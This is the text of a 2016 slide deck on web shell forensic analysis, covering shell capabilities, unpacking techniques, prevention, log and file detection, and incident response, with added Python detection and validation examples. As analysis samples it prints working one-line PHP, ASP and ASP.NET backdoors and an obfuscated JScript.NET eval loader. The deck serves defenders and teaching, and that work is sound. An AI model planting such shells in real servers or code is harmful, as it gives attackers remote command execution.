Advanced Web Shell Forensic Analysis Pt. 1 & 2 5-25-2016
Vincent Lo, LYLC Spear & Shield 1
Advanced Web Shell Forensic Analysis
Vincent Lo
■ PART ONE ■
Reminder
Advanced Web Shell Forensic Analysis
Level : Advanced
Prerequisite :
Basic understanding of server-side scripting language, such as
PHP, ASP, and ASP.NET.
Disclaimer
Advanced Web Shell Forensic Analysis
Opinions are my own and not the views of my employer.
Who is this guy?
Vincent Lo
Senior Incident Responder
CISSP, CCE, GCFA Gold, GCIH, GNFA, GREM
Twitter ● @_VincentLo_
Email ● [email protected]
■ PART ONE ● BASIC ■
1:00 pm – 2:00 pm
■ PART TWO ● ADVANCED ■
2:30 pm – 3:30 pm
What are we talking about today?
Agenda
■ PART ONE ● BASIC ■
• Introduction
◦ What are they?
◦ Well-known web shells
What are we talking about today?
Agenda
• Web Shell Analysis Techniques
◦ Dynamic behavior analysis
◦ Static source code analysis
■ PART TWO ● ADVANCED ■
• Advanced source code analysis
• Advanced Features
◦ Hidden Shells
◦ Tunneling
◦ Mass Mailer
◦ DDoS
◦ System targeted shell
What are we talking about today?
Agenda
• Web Shell Prevention
• Web Shell Detection
• Incident Response
• Dynamic web pages
• Written in server-side script languages, such as PHP, JSP, ASP, and
ASP.NET
• Discovered many years ago
• Still evolving….
What are they?
Web Shells
Web Shells | What can they do?
File Manager
• Copy
• Edit
• Delete
• Move
• Execute
• Upload
What can they do?
Web Shells
Server Information
• Operating system information
• Loaded Apache modules
• Disabled PHP functions
• Useful commands
• Downloader commands
• /etc/passwd
What can they do?
Web Shells
Server Information
• CPU Info
• Memory Info
• Partition Info
• PHP Environment
What can they do?
Web Shells
System Thread Information
• List
• Kill
What can they do?
Web Shells
Console
• Run your own commands
What can they do?
Web Shells
Console
• List dir
• Find
• Locate
What can they do?
Web Shells
PHP
• Execute your own codes
What can they do?
Web Shells
String Tools
• String conversion
• Encode/Decode
• MD5 cracking websites
What can they do?
Web Shells
Bruteforce
• FTP
• MySql
• PostgreSql
What can they do?
Web Shells
SQL
• MySql
• PostgreSql
What can they do?
Web Shells
Network
• Bind port to /bin/sh
• Back-connect
What can they do?
Web Shells
Self Remove
What can they do?
Web Shells
AND MORE… (will be introduced in PART TWO.)
What can they do?
Web Shells
• WSO (FilesMan)
• b374n
• c99
• China Chopper (client program)
• Weevely
• And more…
Well known web shells
Web Shells
Well, what if they are found on your web servers?
Why do we care?
Web Shells
Source: http://krebsonsecurity.com/2016/02/breached-credit-union-comes-out-of-its-shell/
Real Incident
Web Shells
How did they get into our web servers?
Web Shells
• Cross-Site Scripting;
• SQL Injection;
• Vulnerabilities in applications/services (e.g., WordPress or other CMS applications);
• File processing vulnerabilities (e.g., upload filtering or assigned permissions);
• Remote File Include (RFI) and Local File Include (LFI) vulnerabilities;
• Exposed Admin Interfaces (possible areas to find vulnerabilities mentioned above).
How did they get into our web servers?
Web Shells
Source: https://www.us-cert.gov/ncas/alerts/TA15-314A
Web Shell Analysis | “If you know the enemy and yourself, you need not fear battles.”
“If you know the enemy and yourself, you need not fear battles.
If you know yourself but not the enemy, for every victory gained you will also
suffer a defeat.
If you know neither the enemy nor yourself, you will succumb in every battle.”
- The Art of War by Sun Tzu
Why do we need to analyze them?
Web Shell Analysis
• Dynamic behavior analysis
• Static source code analysis
◦ What to look for?
◦ What to do if it is packed?
◦ What if….?
• Advanced source code analysis
How to analyze them?
Web Shell Analysis
• Analysis Environment
◦ Sandbox
◦ Private Network
• Operating System
◦ Linux
◦ Windows
• Web Server
◦ Apache
◦ IIS
◦ Java Web Server
• Web Server Configuration
◦ Permission
Dynamic behavior analysis | Environment
Web Shell Analysis
• Consulting work
◦ Pre-build the environment/template to reduce the response time.
◦ Try to mimic the client’s web server environment as much as possible.
Dynamic behavior analysis | Environment
Web Shell Analysis
• Ideal Environment
Dynamic behavior analysis | Environment
Web Shell Analysis
Demonstration
• WSO 2.0
Dynamic behavior analysis
Web Shell Analysis
• Pros
◦ Easy to understand how web shells work.
◦ Identify their features and artefacts in a short time.
◦ Can test functions and see if they really work.
• Cons
◦ May miss hidden functions.
◦ May not work if web shells require passwords.
◦ May need time to build/configure the environment.
Dynamic behavior analysis
Web Shell Analysis
• First time?
• Need to understand the server-side script languages.
◦ Google can be your best friend.
• Review code and get familiar with attack techniques.
• Don’t get discouraged and don’t give up easily.
◦ Some web shells are designed to be hard to read.
◦ Some web shells even contain fake functions/code.
• Don’t worry. Review speed increases once you are more familiar with the code.
Static source code analysis
Web Shell Analysis
• Exercise (WSO 2.0)
• Try to identify interesting functions.
Static source code analysis | PHP | What to look for?
Web Shell Analysis
• Exercise (WSO 2.0)
• Password
◦ Password is provided if you are lucky. ☺
◦ MD5 algorithm?
Static source code analysis | PHP | What to look for?
Web Shell Analysis
• Exercise (WSO 2.0)
• Password
◦ MD5 algorithm!
Static source code analysis | PHP | What to look for?
Web Shell Analysis
• Exercise (WSO 2.0)
• Avoid search engines
◦ HTTP 404 – Not Found
◦ Exit
Static source code analysis | PHP | What to look for?
Web Shell Analysis
• Exercise (WSO 2.0)
• Commands behind the scenes
Static source code analysis | PHP | What to look for?
Web Shell Analysis
• Exercise (WSO 2.0)
• KOI8-R & KOI8-U
Static source code analysis | PHP | What to look for?
Web Shell Analysis
• Variable names
• Passwords
• Interesting functions
• Comments if you are lucky. ☺
Static source code analysis | PHP | What to look for?
Web Shell Analysis
• Comments ☺
Static source code analysis | PHP | What to look for?
Web Shell Analysis
46
• Find the password
• Check the source code
• Crack it
• Bypass/Kill the password
Static source code analysis | PHP | Password protected
Web Shell Analysis
• Login password
◦ Validation algorithm
◦ MD5/SHA1
◦ Customised algorithm
• HTTP 404 code
• HTTP 404 page
• Variable Names
Static source code analysis | PHP | Obfuscation Techniques
Web Shell Analysis
Static source code analysis | PHP | What if it is packed?
Web Shell Analysis
• Decoding environment
◦ Web server
◦ Web components
◦ Browser
• Decoding tools
◦ Online
◦ Manual
◦ May need to develop decoding tools to assist
• Encoding algorithm
◦ Base64
◦ ROT13
◦ Character encoding
◦ Customised encoding algorithms
◦ Multiple encoding with different algorithms
Static source code analysis | PHP | What if it is packed?
Web Shell Analysis
• Exercise (WSO 2.1)
◦ How to unpack the shell?
◦ eval => echo
Static source code analysis | PHP | What if it is packed?
Web Shell Analysis
• Exercise (b374k)
◦ How to unpack the shell?
◦ String operators
◦ eval => echo
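Both unpacking exercises (WSO 2.1 and b374k) use the eval => echo trick: swap eval for echo in a sandbox so the shell prints its next layer instead of running it. The script below is an added example, not the presenter's or either shell's code, that does the same thing without executing anything: it recognises eval wrapped around base64_decode, gzinflate, gzuncompress, str_rot13 and strrev, applies the decoders in the right order with Python equivalents, and repeats until plain source remains. The packed sample is constructed inside the block by wrapping a harmless echo statement the same way shells are packed; the wrapper regex is an assumption and only covers a string literal inside the eval chain.

```python
"""Unpack eval(base64_decode(gzinflate(...))) style layers without executing them.

Statically mirrors the eval => echo technique: peel each recognised wrapper
in Python and return the plain source. The packed sample is constructed here
by wrapping a benign PHP snippet."""
import base64
import codecs
import re
import zlib

DECODERS = ("base64_decode", "gzinflate", "gzuncompress", "str_rot13", "strrev")

# One eval(...) layer: a chain of decoder calls around a single string literal.
WRAPPER_RE = re.compile(
    r"^\s*(?:<\?php\s*)?eval\s*\(\s*(?P<chain>(?:(?:%s)\s*\(\s*)+)" % "|".join(DECODERS)
    + r"['\"](?P<payload>[^'\"]*)['\"]\s*\)+\s*;?\s*(?:\?>)?\s*$",
    re.S,
)

def apply_decoder(name, data):
    """Apply one PHP decoding function to bytes, mirroring PHP semantics."""
    if name == "base64_decode":
        return base64.b64decode(data)
    if name == "gzinflate":            # raw DEFLATE stream, no zlib header
        return zlib.decompress(data, -15)
    if name == "gzuncompress":         # zlib-wrapped stream
        return zlib.decompress(data)
    if name == "str_rot13":
        return codecs.encode(data.decode("latin-1"), "rot13").encode("latin-1")
    if name == "strrev":
        return data[::-1]
    raise ValueError("unknown decoder " + name)

def unpack_layer(src):
    """Peel one eval(...) layer. Returns (decoded_source, [decoders in source order]) or None."""
    m = WRAPPER_RE.match(src)
    if not m:
        return None
    chain = re.findall("|".join(DECODERS), m.group("chain"))
    data = m.group("payload").encode("latin-1")
    for name in reversed(chain):       # innermost call is applied first
        data = apply_decoder(name, data)
    return data.decode("latin-1"), chain

def unpack_all(src, max_layers=20):
    """Peel layers until plain code remains. Returns (plain_source, layer_log)."""
    log = []
    for _ in range(max_layers):
        step = unpack_layer(src)
        if step is None:
            break
        src, chain = step
        log.append(chain)
    return src, log

# --- constructed sample: pack a harmless snippet the way shells are packed ---
def pack_sample(plain):
    """Wrap plain PHP in rot13 -> raw DEFLATE -> base64, then a second base64 eval layer."""
    rot = codecs.encode(plain, "rot13").encode("latin-1")
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)      # raw DEFLATE, as PHP gzdeflate() makes
    deflated = comp.compress(rot) + comp.flush()
    layer1 = "eval(str_rot13(gzinflate(base64_decode('%s'))));" % base64.b64encode(deflated).decode()
    outer = base64.b64encode(layer1.encode()).decode()
    return "<?php eval(base64_decode('%s')); ?>" % outer

PLAIN = "<?php echo 'hello from the inner layer'; ?>"
PACKED = pack_sample(PLAIN)

if __name__ == "__main__":
    source, layers = unpack_all(PACKED)
    print(layers)   # [['base64_decode'], ['str_rot13', 'gzinflate', 'base64_decode']]
    print(source)
```

The layer log is as useful as the final source: the sequence of decoders is a fingerprint of the packer, and it tells you which slide's case (single wrapper, string operators, multiple algorithms) you are looking at. Shells that build the payload with string concatenation or variable functions fall outside this regex and still need the sandbox approach.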
Intermittent
Web Shells
<script runat="server" language="JScript">
// Loader pattern seen in ASP.NET web shells: the payload sits on disk as a
// hex string and is only decoded, then evaluated with "unsafe", per request,
// so a reviewer reading the file never sees the commands it runs.
function exs(str) {
    var q = "u";
    var w = "afe";
    var a = q + "ns" + w;            // assembles the string "unsafe" in pieces
    var b= /*///*/eval(str,a);       // JScript.NET eval(code, "unsafe"); the empty
                                     // block comment looks like a line comment on a quick read
    return(b);
}
function dec(str,key) {
    // Decoder: reads two hex digits (four when the first is not a digit),
    // subtracts one digit of the numeric key chosen by position, and appends
    // the resulting character. char() and int() are not JScript built-ins and
    // are not defined in this fragment.
    var k,q,t;
    var s="";
    var p="";
    for(k = 0; k < str.length; k=k+2)
    {
        t = ((k+2)/2) % key.length;
        p = key.substr(t, 1);
        if (isFinite(str.substr(k, 1)))
        {
            q = "0x"+ str.substr(k, 2);
            s = s + char(int(q)-p);// + "|" + p +"|";
        }
        else
        {
            q = "0x"+ str.substr(k, 4);
            s = s + char(int(q)-p);
            k = k+2;
        }
    }
    return(s);
}
</script>
<%
// Two rounds of eval: the decoded string is itself code that is evaluated again.
exs(exs(dec("556675766874782F4C75696E5E237E2360","1314")));
%>
Advanced Web Shell Forensic Analysis
Vincent Lo
■ PART TWO ■
Advanced Source Code Analysis | What if…?
Demonstration
ASP | Self Changing Codes
Advanced Source Code Analysis
What if…?
Advanced Source Code Analysis
• What if we have not much to review?
What if…? | One Sentence Trojan
Advanced Source Code Analysis
• One Sentence Trojan (一句話木馬)
• PHP: <?php eval($_POST[cmd]);?>
• ASP: <%execute(request("cmd"))%>
• ASP.NET: <%@ Page Language="Jscript"%>
<%eval(Request.Item["cmd"],"unsafe")%>
Source: http://baike.baidu.com/view/102246.htm
What if…? | One Sentence Trojan
Advanced Source Code Analysis
Client/Server Architecture
What if…? | One Sentence Trojan
Advanced Source Code Analysis
Client Programs
• China Chopper (中国菜刀)
• Lanker (lanker一句话客户端)
• ZV (ZV新型PHP一句话木马客户端GUI版)
• 一句话客户端增强版
Source: http://baike.baidu.com/view/102246.htm
What if…? | One Sentence Trojan
Advanced Source Code Analysis
In the real world, one sentence trojan code is not always the same. It can be modified or encoded to evade detection.
• <%eval request("value")%>
• <%execute request("value")%>
• <%execute(request("value"))%>
• <%If Request("value")<>"" Then Execute(Request("value"))%>
• <%if request ("value")<>"" then session("value")=request("value"):end if:if session("value")<>"" then execute session("value")%>
Source: http://baike.baidu.com/view/102246.htm
What if…? | One Sentence Trojan
Advanced Source Code Analysis
How do we analyze it?
• Web server logs
• IDS/IPS alerts
• Proxy logs
• PCAP
Advanced Features | Hidden Shells
Hidden | JPEG
Advanced Features
JPEG EXIF
Hide malicious codes in EXIF fields or embed them in files.
Steganography
http://www.slideshare.net/saumilshah/stegosploit-hacking-with-pictures
Source: http://www.arkteam.net/?p=48
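The slide above describes code hidden in EXIF fields or appended to an image file. The script below is an added example, not the presenter's tooling and not related to the Stegosploit work it cites: it walks the JPEG marker segments by hand (no image library needed), pulls out the APPn and COM payloads where EXIF and comments live, and flags script markers in those segments or in any bytes trailing the end-of-image marker. The two JPEGs it scans are constructed inline as minimal valid marker sequences, not real photos, and the marker list is an assumption.

```python
"""Scan a JPEG's metadata segments for embedded script code.

Walks the marker segments, extracts APPn/COM payloads, and flags any segment
or trailing bytes that contain script markers. The sample JPEGs are built by
hand here (valid marker structure, no real image data)."""
import re
import struct

SCRIPT_MARKERS = re.compile(rb"<\?php|<\?=|<%|eval\s*\(|base64_decode\s*\(|system\s*\(", re.I)

def iter_segments(data):
    """Yield (marker, offset, payload) for each segment up to and including SOS."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG (missing SOI)")
    pos = 2
    while pos + 4 <= len(data) and data[pos] == 0xFF:
        marker = data[pos + 1]
        if marker == 0xD9:                              # EOI
            return
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]   # includes the 2 length bytes
        yield marker, pos, data[pos + 4:pos + 2 + length]
        if marker == 0xDA:                              # SOS: entropy-coded data follows
            return
        pos += 2 + length

def find_trailer(data):
    """Bytes after the last EOI marker (a classic place to append a shell)."""
    end = data.rfind(b"\xff\xd9")
    return data[end + 2:] if end != -1 else b""

def scan_jpeg(data):
    """Return findings as (where, offset, matched_text) tuples."""
    findings = []
    for marker, offset, payload in iter_segments(data):
        if 0xE0 <= marker <= 0xEF or marker == 0xFE:    # APP0..APP15 or COM
            where = "COM" if marker == 0xFE else "APP%d" % (marker - 0xE0)
            for m in SCRIPT_MARKERS.finditer(payload):
                findings.append((where, offset, m.group(0).decode("latin-1")))
    trailer = find_trailer(data)
    for m in SCRIPT_MARKERS.finditer(trailer):
        findings.append(("trailer", len(data) - len(trailer), m.group(0).decode("latin-1")))
    return findings

def build_sample(comment, app1, trailer=b""):
    """Construct a minimal JPEG: SOI, APP1, COM, SOS header, two dummy bytes, EOI, trailer."""
    def seg(marker, payload):
        return b"\xff" + bytes([marker]) + struct.pack(">H", len(payload) + 2) + payload
    return (b"\xff\xd8" + seg(0xE1, app1) + seg(0xFE, comment)
            + seg(0xDA, b"\x01\x00") + b"\x00\x00" + b"\xff\xd9" + trailer)

# Constructed samples: a clean file and one carrying PHP in its APP1 (EXIF) data
# and another PHP block appended after EOI.
CLEAN = build_sample(b"holiday photo", b"Exif\x00\x00MM\x00*")
TAINTED = build_sample(b"holiday photo",
                       b"Exif\x00\x00MM\x00*<?php /* exif-field payload */ ?>",
                       trailer=b"\n<?php echo 'appended'; ?>")

if __name__ == "__main__":
    print(scan_jpeg(CLEAN))      # []
    print(scan_jpeg(TAINTED))    # [('APP1', 2, '<?php'), ('trailer', 61, '<?php')]
```

A hit in an APP or COM segment is only dangerous if something on the server will execute it (an include of the image path, or a handler mapping that treats it as script), so pair this scan with the upload-directory permission checks in the prevention section.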
Advanced Features | Tunneling
Tunneling
Advanced Features
SOCKS Proxy | reGeorg
Advanced Features
“The successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.”
• Client is written in Python
• Supports multiple server-side languages
◦ PHP
◦ ASPX
◦ ASHX
◦ JSP
Source: https://github.com/sensepost/reGeorg
Tunna
Advanced Features
“Tunna is a set of tools which will wrap and tunnel any TCP communication over HTTP. It can be used to bypass network restrictions in fully firewalled environments.”
• Client is written in Python
• Supports multiple server-side languages
◦ PHP
◦ ASPX
◦ JSP
Source: https://github.com/SECFORCE/Tunna
Advanced Features | Mass Mailer
Mass Mailer
Advanced Features
Advanced Features | Distributed Denial of Service
Why web servers?
• 24 x 7
• Accessibility
• Usually more powerful than PCs
• Bandwidth
DDoS
Advanced Features
Shell Booter
• Execute Booter
• Panic Stresser
• Vengeance Booter
• Anonymous Booter
• And more…
Advanced Features
DDoS | Shell Booter
Advanced Features | System targeted shells
Advanced Features
System targeted web shells | WHMCS Killer
WHMCS
Advanced Features
System targeted web shells | WHMCS Killer
WHMCS Killer
Advanced Features
System targeted web shells | cPanel Cracker
cPanel
Advanced Features
System targeted web shells | cPanel Cracker
cPanel Cracker
Web Shell Prevention | “Prevention is more important than detection and recovery.”
Web Shell Prevention
Web Shell Prevention | Attacks, Vulnerabilities, & Patches
• Web Application Firewall
• Penetration Testing
◦ Update code
• Updates & Patches
◦ Operating System
◦ Web servers
◦ Web server components
◦ CMS & its plugins
Web Shell Prevention | Securing CMS
Web Shell Prevention
Source: https://www.us-cert.gov/ncas/alerts/TA15-314A
Web Shell Prevention | Securing CMS
Web Shell Prevention
Source: http://asd.gov.au/publications/protect/securing-cms.htm
Web Shell Prevention
Web Shell Prevention | Securing CMS
Hardening WordPress: http://codex.wordpress.org/Hardening_WordPress
Joomla – Security Checklist: https://docs.joomla.org/Security_Checklist
Web Shell Prevention
Web Shell Prevention | Upload Function
• Check uploaded files
◦ Whitelist file extensions
◦ Check the file extension properly
◦ .php.jpg, .jpg.asp, .php;.jpg and so on.
◦ Don’t rely on file types
◦ Be careful about .cer if using IIS
• Randomize uploaded filenames
• Disable “execute” permission
• Don’t name it “upload”
◦ upload.aspx, upload.php and so on.
• Don’t show the actual path
◦ Error messages
◦ URLs
• Re-encode/re-generate images
• Disable components/functions that are not required.
◦ eval, base64, gzinflate
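The upload-function checklist above translates directly into a validation step. The code below is an added example, written in Python rather than in the PHP or ASP.NET an upload handler would normally use, and not the presenter's code: it whitelists the final extension, rejects nested or semicolon-separated executable extensions such as .php.jpg and .php;.jpg (and .cer, which the slide calls out for IIS), checks the file's leading bytes instead of the client-supplied type, strips any path the client sent, and returns a random server-side filename. The whitelist, blocked-token list and sample inputs are assumptions for the example; image re-encoding is left to an image library and is not shown.

```python
"""Upload validation implementing the checklist from the slides.

Whitelists the final extension, rejects nested executable extensions
(.php.jpg, .php;.jpg), verifies magic bytes rather than the declared type,
and returns a random filename so the original name never reaches disk.
Lists and sample inputs are constructed for this example."""
import os
import secrets

# Allowed final extensions and the leading bytes a file of that type must carry.
ALLOWED = {"jpg": b"\xff\xd8\xff", "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8"}
# Tokens that must not appear anywhere in the extension chain.
BLOCKED_TOKENS = {"php", "php3", "php4", "php5", "phtml", "asp", "aspx", "asa", "cer",
                  "jsp", "jspx", "cgi", "pl", "sh", "htaccess"}

class UploadRejected(ValueError):
    pass

def normalise_name(filename):
    """Drop path components and null bytes the client may have sent."""
    name = filename.replace("\x00", "")
    name = name.replace("\\", "/").rsplit("/", 1)[-1]
    return name.lower().strip()

def extension_tokens(name):
    """Every extension-like token: 'x.php;.jpg' -> ['php', 'jpg'], 'a.php.jpg' -> ['php', 'jpg']."""
    parts = name.replace(";", ".").split(".")
    return [p for p in parts[1:] if p]

def validate_upload(filename, data):
    """Return a random, safe filename for the upload or raise UploadRejected."""
    name = normalise_name(filename)
    tokens = extension_tokens(name)
    if not tokens:
        raise UploadRejected("no extension")
    final = tokens[-1]
    if final not in ALLOWED:
        raise UploadRejected("extension not whitelisted: " + final)
    if any(t in BLOCKED_TOKENS for t in tokens):
        raise UploadRejected("nested executable extension in " + name)
    if not data.startswith(ALLOWED[final]):
        raise UploadRejected("content does not match ." + final)
    return secrets.token_hex(16) + "." + final

def is_accepted(filename, data):
    """Convenience wrapper returning True/False instead of raising."""
    try:
        validate_upload(filename, data)
        return True
    except UploadRejected:
        return False

def save_upload(filename, data, upload_dir):
    """Validate, then write under the random name. upload_dir must be served
    without script execution (the 'disable execute permission' slide item)."""
    safe_name = validate_upload(filename, data)
    with open(os.path.join(upload_dir, safe_name), "wb") as fh:
        fh.write(data)
    return safe_name

if __name__ == "__main__":
    jpg = b"\xff\xd8\xff\xe0" + b"\x00" * 16       # constructed JPEG header
    print(validate_upload("photo.JPG", jpg))
    for bad in ("shell.php.jpg", "shell.php;.jpg", "shell.jpg.asp", "cert.cer"):
        print(bad, is_accepted(bad, jpg))           # all False
```

The returned name never echoes the client's filename, which also covers the "don't show the actual path" item: the application can log the random name and keep the original only in a database column.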
Web Shell Detection | Are they on our servers?
• PHP Shell Detector
• NeoPI
• Web Vulnerability Scanners
• Antivirus programs
• IDS/IPS
• File Integrity System
• Customised Script
Web Shell Detection | How do we detect them?
Web Shell Detection
Incident Response | Find evil
• Web server logs
◦ Check integrity of logs
◦ Fields
• Proxy logs
• Web site files
• Relevant servers’ logs & artifacts
• IDS/IPS logs
• Firewall logs
Find evil | Evidence
Incident Response
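The one-sentence-trojan section asks "how do we analyze it?" and answers with web server logs, proxy logs and PCAP, and the evidence slide above lists the same sources. The script below is an added example (not the presenter's tooling) of what that log review looks like in practice: a client program for a one-line shell POSTs straight to the dropped script, sends no Referer, usually comes from one or two addresses, and the script is never fetched with GET by ordinary visitors. The parser reads Apache combined-format lines, profiles each requested path on those signals, and flags paths that trip two or more. The log lines are constructed with documentation IP ranges and an invented site; the signal thresholds are assumptions.

```python
"""Hunt for web shell traffic in web server access logs.

Parses Apache combined-format lines and scores each requested path on the
signals a one-line shell client leaves behind. SAMPLE_LOG is constructed."""
import re
from collections import defaultdict

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample: normal browsing plus a burst of POSTs to a script in an image cache.
SAMPLE_LOG = """\
203.0.113.10 - - [25/May/2016:13:01:02 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 6.1) Firefox/45.0"
203.0.113.10 - - [25/May/2016:13:01:03 +0000] "GET /css/site.css HTTP/1.1" 200 812 "http://www.example.test/index.php" "Mozilla/5.0 (Windows NT 6.1) Firefox/45.0"
203.0.113.11 - - [25/May/2016:13:02:10 +0000] "POST /login.php HTTP/1.1" 302 0 "http://www.example.test/login.php" "Mozilla/5.0 (Macintosh) Safari/601.1"
198.51.100.7 - - [25/May/2016:13:05:41 +0000] "POST /images/cache/x.php HTTP/1.1" 200 318 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
198.51.100.7 - - [25/May/2016:13:05:44 +0000] "POST /images/cache/x.php HTTP/1.1" 200 4210 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
198.51.100.7 - - [25/May/2016:13:06:02 +0000] "POST /images/cache/x.php HTTP/1.1" 200 77 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
203.0.113.12 - - [25/May/2016:13:07:15 +0000] "POST /contact.php HTTP/1.1" 200 2200 "http://www.example.test/contact.php" "Mozilla/5.0 (X11; Linux) Chrome/50.0"
"""

def parse_lines(text):
    """Yield one dict per line that matches the combined log format."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()

def profile_paths(entries):
    """Aggregate per-path counters used for scoring."""
    paths = defaultdict(lambda: {"posts": 0, "gets": 0, "post_no_referer": 0,
                                  "ips": set(), "agents": set()})
    for e in entries:
        p = paths[e["path"]]
        p["ips"].add(e["ip"])
        p["agents"].add(e["ua"])
        if e["method"] == "POST":
            p["posts"] += 1
            if e["referer"] == "-":
                p["post_no_referer"] += 1
        elif e["method"] == "GET":
            p["gets"] += 1
    return paths

def suspicious_paths(text, min_posts=2):
    """Return [(path, reasons)] for paths that look like shell endpoints."""
    flagged = []
    for path, p in profile_paths(parse_lines(text)).items():
        reasons = []
        if p["posts"] >= min_posts and p["post_no_referer"] == p["posts"]:
            reasons.append("only POSTs, never with a Referer")
        if p["gets"] == 0 and p["posts"] > 0:
            reasons.append("never requested with GET")
        if len(p["ips"]) == 1 and p["posts"] >= min_posts:
            reasons.append("all traffic from one client")
        if re.search(r"/(images|cache|uploads|tmp)/.*\.(php|asp|aspx|jsp)$", path):
            reasons.append("script inside a content/upload directory")
        if len(reasons) >= 2:
            flagged.append((path, reasons))
    return flagged

if __name__ == "__main__":
    for path, reasons in suspicious_paths(SAMPLE_LOG):
        print(path, reasons)   # /images/cache/x.php with four reasons
```

Legitimate POST targets such as login and contact forms score at most one signal here because browsers send a Referer and the form page is also fetched with GET; the thresholds should be tuned against a site's normal traffic before use, and the slide's reminder to check log integrity first applies, since a shell operator with file access can edit the access log.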
• Yara
• Grep
Find evil | How do we find them?
Incident Response
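The detection slide lists file integrity systems, NeoPI and customised scripts, and the slide above adds Yara and grep. The script below is an added example, not the presenter's script and not NeoPI's code, that combines those ideas: it hashes a web root into a baseline manifest, diffs the current state against it to find added or modified files, and scores only those files with a NeoPI-style content measure (Shannon entropy and the longest whitespace-free token, both high for packed code) plus a grep of telltale patterns. The demo web root, the patterns and the thresholds are constructed for this example.

```python
"""Find web shells on disk: baseline integrity diff plus content scoring.

Hash manifest of a known-good web root compared with the current state,
then entropy / longest-token scoring and a pattern grep on what changed.
Demo files are created in a temporary directory and removed afterwards."""
import hashlib
import math
import os
import re
import shutil
import tempfile

TELLTALES = re.compile(
    rb"eval\s*\(|base64_decode\s*\(|gzinflate\s*\(|\$_(?:POST|GET|REQUEST)\s*\[|FilesMan|preg_replace\s*\([^)]*/e",
    re.I)

def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def build_manifest(root):
    """Map of relative path -> sha256 for every file under root."""
    manifest = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            manifest[os.path.relpath(full, root).replace(os.sep, "/")] = sha256_file(full)
    return manifest

def diff_manifest(baseline, current):
    """Return (added, modified, removed) relative paths."""
    added = sorted(p for p in current if p not in baseline)
    removed = sorted(p for p in baseline if p not in current)
    modified = sorted(p for p in current if p in baseline and current[p] != baseline[p])
    return added, modified, removed

def shannon_entropy(data):
    """Bits per byte; packed or encoded blobs sit well above plain source."""
    if not data:
        return 0.0
    counts = {}
    for b in data:
        counts[b] = counts.get(b, 0) + 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def longest_token(data):
    """Length of the longest run without whitespace (a packed payload is one huge token)."""
    return max((len(t) for t in re.split(rb"\s+", data)), default=0)

def score_file(path):
    with open(path, "rb") as fh:
        data = fh.read()
    return {
        "entropy": round(shannon_entropy(data), 2),
        "longest_token": longest_token(data),
        "telltales": sorted({m.group(0).decode("latin-1") for m in TELLTALES.finditer(data)}),
    }

def is_suspicious(score):
    # Thresholds are assumptions for the example; tune them against a clean code base.
    return bool(score["telltales"]) or score["entropy"] > 5.5 or score["longest_token"] > 500

def scan(root, baseline):
    """Score files that are new or changed since the baseline; return {path: score}."""
    added, modified, _ = diff_manifest(baseline, build_manifest(root))
    results = {}
    for rel in added + modified:
        score = score_file(os.path.join(root, rel))
        if is_suspicious(score):
            results[rel] = score
    return results

def demo():
    """Constructed web root: a clean site, then a dropped file and a backdoored library."""
    root = tempfile.mkdtemp()
    try:
        def put(rel, content):
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "wb") as fh:
                fh.write(content)
        put("index.php", b"<?php include 'lib/app.php'; render_home(); ?>\n")
        put("lib/app.php", b"<?php function render_home() { echo 'home'; } ?>\n")
        baseline = build_manifest(root)
        # Two changes made after the baseline was taken.
        put("images/cache/x.php", b"<?php @eval($_POST['p']); ?>")
        put("lib/app.php", b"<?php function render_home() { echo 'home'; } ?>\n"
                           b"<?php eval(base64_decode('" + b"A" * 600 + b"')); ?>")
        return sorted(scan(root, baseline))
    finally:
        shutil.rmtree(root, ignore_errors=True)

if __name__ == "__main__":
    print(demo())   # ['images/cache/x.php', 'lib/app.php']
```

Scoring only the files the manifest says changed is what keeps this usable on a large CMS install: the pattern grep alone would fire on plenty of legitimate plugin code, but a legitimate file that has not changed since the baseline is never examined.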
Find evil | Experience
Incident Response
Recap | What do we learn today?
• Well-known web shells
• Dynamic analysis
• Static analysis
• Web shell prevention and detection
• Incident response
• The analysis concepts we learned today also work for analyzing malicious PowerShell scripts.
What do we learn today?
Recap
Vincent Lo | Senior Incident Responder
TWITTER ■ @_VincentLo_
EMAIL ■ [email protected]
LYLC-SPEARANDSHIELD.TUMBLR.COM
THANK YOU